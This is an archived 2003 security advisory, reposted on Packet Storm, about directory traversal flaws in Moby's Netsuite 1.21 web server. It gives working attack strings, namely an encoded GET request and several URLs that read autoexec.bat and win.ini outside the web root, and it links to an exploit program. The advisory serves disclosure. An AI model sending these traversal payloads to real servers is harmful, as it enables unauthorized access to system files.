what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Netsuite121.txt

Netsuite121.txt
Posted Jul 15, 2003
Authored by Dr. Insane | Site members.lycos.co.uk

Moby's Netsuite 1.21 httpd server is vulnerable to a multitude of directory traversal bugs that allow an attacker to access files outside of the web root.

tags | exploit, web, root
SHA-256 | c3a9e9ae00e9e67b478e9d3093cc3f9669abbf2620d5783b4b97471d46479220

Netsuite121.txt

Change Mirror Download

Moby's Netsuite 1.21 Traversal Directory bugs


Release Date:
13 July, 2003


Description:
NetSuite is a freeware server suite that allows anyone with a static IP address the ability to run their own mail and web services. Note that you cannot reasonably run a web server from a normal dial-in account.
Netsuite is designed for complete simplicity -- requiring only a few minutes to setup with no prior network skills or experience, and requires virtually no memory or processor time. General Windows file management and an understanding of the Internet is required. There are two sections: Moby Mail and Moby Web. Both are very direct to install and use, requiring only few minutes to begin using. Full source code for Microsoft Visual C++ 6.0 is available on the web.

There exists some directory traversal vulnerabilities that allow someone to download or read
files outside the web folder. In order for this attack to work we have to use some HTML characters instead of normal one.


The attack:

GET / HTTP/1.1
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat

In our example above we want to see the file autoexec.bat.
***The folder /error/ doesn't exist in my Pc:P ehhe

Other attack strings: http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://127.0.0.1/\..\..\..\windows\win.ini
While i was searching i found about 25 attack string.This is only a small sample above.


The Attack Program:
I have created a sample attack program for Moby's Netsuite 1.21(possibly it for all versions of Moby's Netsuite ). You can get it from here:
http://members.lycos.co.uk/r34ct/main/Netsuite_expl/


Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.


Feedback
Please send suggestions, updates, and comments to:
Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close